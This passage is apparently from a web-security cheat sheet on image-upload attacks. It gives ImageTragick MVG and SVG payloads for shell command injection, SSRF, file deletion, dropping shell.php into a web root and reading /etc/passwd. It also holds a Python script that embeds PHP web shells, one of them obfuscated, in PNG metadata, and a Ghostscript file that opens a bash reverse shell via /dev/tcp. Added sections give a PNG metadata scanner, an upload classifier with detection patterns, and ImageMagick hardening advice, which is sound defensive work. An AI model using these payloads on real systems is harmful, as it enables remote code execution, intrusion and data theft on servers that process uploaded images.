## Image Uploads

### ImageTragick Files

ImageTragick Shell Execution (exploit.mvg):

```
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg";|ls "-la)'
pop graphic-context
```

ImageTragick Shell Execution (exploit.svg):

```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="640px" height="480px" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="https://example.com/image.jpg&quot;|ls &quot;-la" x="0" y="0" height="640px" width="480px"/>
</svg>
```

ImageTragick Reverse Shell Execution (exploit.mvg):

```
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
pop graphic-context
pop graphic-context
```

ImageTragick SSRF (ssrf.mvg):

```
push graphic-context
viewbox 0 0 640 480
fill 'url(http://example.com/)'
pop graphic-context
```

ImageTragick File Deletion (delete_file.mvg):

```
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'ephemeral:/tmp/delete.txt'
pop graphic-context
```

ImageTragick File Move (file_move.mvg):

```
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'msl:/tmp/msl.txt'
pop graphic-context
```

ImageTragick File Move (file_move.svg):

```xml
<?xml version="1.0" encoding="UTF-8"?>
<image>
  <read filename="/tmp/image.gif" />
  <write filename="/var/www/shell.php" />
</image>
```

ImageTragick File Read (file_read.mvg):

```
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'label:@/etc/passwd'
pop graphic-context
```

### Image LFI

PNG Generator:

```python
from PIL import Image
from PIL import PngImagePlugin  # undocumented class, used to write custom tEXt chunks

# Shellcodes - Bypass included : Keyword Recognition : System, GET, php
# --- How to use : http://localhost/shell.php?c=echo%20'<pre>';ls
#shellcode = "<?=@`$_GET[c]`;"
shellcode = "<?php system($_GET['c']); ?>"

# --- How to use : http://localhost/shell.php?_=system&__=echo%20'<pre>';ls
shellcode2 = "<?='Sh3ll'; $_='{';$_=($_^'<').($_^'>;').($_^'/');?><?=${'_'.$_}['_'](${'_'.$_}['__']);?>"

print("\n[+] Advanced Upload - Shell inside metadatas of a PNG file")

# Create a backdoored PNG
print(" - Creating a payload.png")
im = Image.new("RGB", (10, 10), "Black")
im.info["shell"] = shellcode
reserved = ('interlace', 'gamma', 'dpi', 'transparency', 'aspect')

meta = PngImagePlugin.PngInfo()

# copy metadata into new object
for k, v in im.info.items():
    if k in reserved:
        continue
    meta.add_text(k, v, 0)

im.save("payload.png", "PNG", pnginfo=meta)
print("Done")
```
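Defender-side counterpart to the generator above, added here as an example and not part of the original page: the PNG produced is a perfectly valid image, so an upload check that only asks "does the image library open it?" never sees the payload. The scanner below walks the PNG chunk structure directly (standard library only, no PIL), verifies each CRC, pulls the text out of `tEXt`, `zTXt` and `iTXt` chunks, and flags PHP open tags; `strip_text_chunks` is the matching mitigation, rewriting the file with all text chunks removed. `SAMPLE_PAYLOAD` is a constructed 1x1 PNG carrying the same one-liner in a `tEXt` chunk keyed `shell`; function and variable names are this example's own.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# Chunk types that carry free-form text; pixel data stays valid whatever they contain,
# so a "does it open?" check alone never notices a PHP tag hidden here.
TEXT_CHUNKS = {b"tEXt", b"zTXt", b"iTXt"}
# Open tags a PHP interpreter would act on if the file were ever included or executed.
SUSPICIOUS_MARKERS = (b"<?php", b"<?=")


def iter_chunks(data):
    """Yield (type, payload) for each chunk, verifying length and CRC.
    Malformed input raises ValueError instead of being guessed at."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG: bad signature")
    pos = len(PNG_SIGNATURE)
    while pos < len(data):
        if pos + 8 > len(data):
            raise ValueError("truncated chunk header")
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        start, end = pos + 8, pos + 8 + length
        if end + 4 > len(data):
            raise ValueError("truncated chunk body")
        payload = data[start:end]
        (crc,) = struct.unpack(">I", data[end:end + 4])
        if zlib.crc32(ctype + payload) != crc:
            raise ValueError("bad CRC in chunk %r" % ctype)
        yield ctype, payload
        pos = end + 4
        if ctype == b"IEND":
            break


def chunk_text(ctype, payload):
    """Return (keyword, text) for a text chunk, inflating zTXt/iTXt if compressed."""
    keyword, _, rest = payload.partition(b"\x00")
    if ctype == b"tEXt":
        text = rest
    elif ctype == b"zTXt":
        text = zlib.decompress(rest[1:])          # rest[0] is the compression method
    else:                                         # iTXt
        comp_flag, rest = rest[0], rest[2:]       # flag, method, then two NUL-terminated fields
        _lang, _, rest = rest.partition(b"\x00")
        _tkey, _, text = rest.partition(b"\x00")
        if comp_flag == 1:
            text = zlib.decompress(text)
    return keyword, text


def find_embedded_code(data):
    """List (chunk_type, keyword, marker) for each text chunk holding a PHP open tag."""
    hits = []
    for ctype, payload in iter_chunks(data):
        if ctype not in TEXT_CHUNKS:
            continue
        keyword, text = chunk_text(ctype, payload)
        for marker in SUSPICIOUS_MARKERS:
            if marker in text:
                hits.append((ctype.decode(), keyword.decode("latin-1"), marker.decode()))
                break
    return hits


def _chunk(ctype, payload):
    return (struct.pack(">I", len(payload)) + ctype + payload
            + struct.pack(">I", zlib.crc32(ctype + payload)))


def strip_text_chunks(data):
    """Mitigation: rewrite the PNG without any text chunks. Pixels are untouched."""
    out = bytearray(PNG_SIGNATURE)
    for ctype, payload in iter_chunks(data):
        if ctype not in TEXT_CHUNKS:
            out += _chunk(ctype, payload)
    return bytes(out)


def build_sample_png(text_payload):
    """Constructed 1x1 PNG with a tEXt chunk keyed "shell", the shape the generator above emits."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # 1x1, 8-bit RGB
    idat = zlib.compress(b"\x00\x00\x00\x00")              # filter byte + one black pixel
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"tEXt", b"shell\x00" + text_payload)
            + _chunk(b"IDAT", idat) + _chunk(b"IEND", b""))


# Constructed sample: the same PHP one-liner as the generator above, inside a tEXt chunk.
SAMPLE_PAYLOAD = build_sample_png(b"<?php system($_GET['c']); ?>")

if __name__ == "__main__":
    print(find_embedded_code(SAMPLE_PAYLOAD))                     # [('tEXt', 'shell', '<?php')]
    print(find_embedded_code(strip_text_chunks(SAMPLE_PAYLOAD)))  # []
```

Scanning metadata catches this particular trick, but the durable fix is not to let uploaded files be served from a path where the web server or `include()` could ever interpret them: re-encode every accepted image to a fresh file (which also drops the text chunks), store it under a server-chosen name outside the document root, and serve it with a fixed image `Content-Type`.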

GhostScript Exploit:

```
%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/test.example.com/80 0>&1') currentdevice putdeviceprops
```
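Every ImageTragick payload above and the GhostScript file share one property: they are text, not raster data, and the processing library identifies the format from the content rather than from the uploaded file name. The check below, added here as an example and not part of the original page, is the gate a defender puts in front of ImageMagick or Ghostscript: accept only files whose magic bytes are an allowed raster type, reject anything that reads as MVG, SVG, MSL or PostScript, and additionally report the coder references and delegate tricks the payloads rely on (`ephemeral:`, `msl:`, `label:`, `url(`, `%pipe%`, a `|` after a quote). It goes beyond the page's specific cases in covering all four text formats in one pass. `SAMPLES` are constructed inputs with placeholder paths and commands, and all names are this example's own.

```python
import re

# Raster formats the endpoint will accept, recognised by magic bytes rather than by
# the extension or Content-Type the client chose.
ALLOWED_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

# Text formats that ImageMagick or Ghostscript will parse whatever the upload was
# named; one entry per payload shape on this page.
TEXT_FORMAT_MARKERS = [
    (re.compile(rb"^\s*push\s+graphic-context", re.I | re.M), "MVG"),
    (re.compile(rb"<svg\b", re.I), "SVG"),
    (re.compile(rb"<image>\s*<read\b", re.I), "MSL"),
    (re.compile(rb"^%!PS", re.M), "PostScript"),
]

# Coder references and delegate tricks that never belong in a user-supplied picture.
# Anchored on the quote or url( that precedes them so an XMP namespace URL inside a
# real JPEG is not mistaken for a remote fetch.
INDICATORS = [
    (re.compile(rb"(?:['\"]|&quot;)\s*(?:ephemeral|msl|label|text):", re.I), "ImageMagick coder reference"),
    (re.compile(rb"url\(\s*https?:|xlink:href\s*=\s*['\"]https?:", re.I), "remote fetch (SSRF)"),
    (re.compile(rb"%pipe%", re.I), "Ghostscript %pipe% device"),
    (re.compile(rb"(?:['\"]|&quot;|;)\s*\|"), "shell pipe in quoted argument"),
    (re.compile(rb"/dev/tcp/"), "bash network redirection"),
]


def sniff_raster(data):
    """Return the accepted raster type whose magic bytes open the file, or None."""
    for magic, name in ALLOWED_MAGIC.items():
        if data.startswith(magic):
            return name
    return None


def classify_upload(data, head=64 * 1024):
    """Decide whether raw upload bytes may be handed to an image library.
    Only the first `head` bytes are pattern-scanned: every marker above sits
    near the start of a text-based file, which bounds the cost on large uploads."""
    sample = data[:head]
    text_formats = [name for rx, name in TEXT_FORMAT_MARKERS if rx.search(sample)]
    indicators = [name for rx, name in INDICATORS if rx.search(sample)]
    raster = sniff_raster(data)
    verdict = "accept" if raster and not text_formats and not indicators else "reject"
    return {"raster": raster, "text_formats": text_formats,
            "indicators": indicators, "verdict": verdict}


# Constructed samples, not real files: trimmed versions of the payload shapes on this
# page with placeholder paths/commands, plus two benign files that must pass.
SAMPLES = {
    "ssrf.mvg": b"push graphic-context\nviewbox 0 0 640 480\nfill 'url(http://example.com/)'\npop graphic-context\n",
    "delete_file.mvg": b"push graphic-context\nviewbox 0 0 640 480\nimage over 0,0 0,0 'ephemeral:/tmp/PLACEHOLDER.txt'\npop graphic-context\n",
    "file_move.msl": b'<?xml version="1.0" encoding="UTF-8"?>\n<image>\n <read filename="/tmp/PLACEHOLDER.gif" />\n <write filename="/var/www/PLACEHOLDER.php" />\n</image>\n',
    "exploit.ps": b"%!PS\nmark /OutputFile (%pipe%PLACEHOLDER_COMMAND) currentdevice putdeviceprops\n",
    "clean.png": b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\rIHDR" + b"\x00" * 17,
    # A JPEG with an XMP segment: contains "http://" but no fetch directive, must not be rejected.
    "photo.jpg": b"\xff\xd8\xff\xe1\x00\x40http://ns.adobe.com/xap/1.0/\x00<x:xmpmeta xmlns:x='adobe:ns:meta/'/>",
}


def scan_all(samples=SAMPLES):
    """Map each sample name to its verdict."""
    return {name: classify_upload(data)["verdict"] for name, data in samples.items()}


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, classify_upload(data))
```

This gate is a first filter, not the whole defence. On the ImageMagick side the ImageTragick advisory's mitigation still applies: a `policy.xml` that grants no rights to the `EPHEMERAL`, `URL`, `HTTPS`, `MVG`, `MSL`, `TEXT`, `SHOW`, `WIN` and `PLT` coders removes the delegates these payloads depend on. Ghostscript should only ever see input the application itself generated, and both tools belong in a sandbox with no network access and a minimal filesystem view, so a parser bug that slips past content checks cannot reach `/dev/tcp` or the web root.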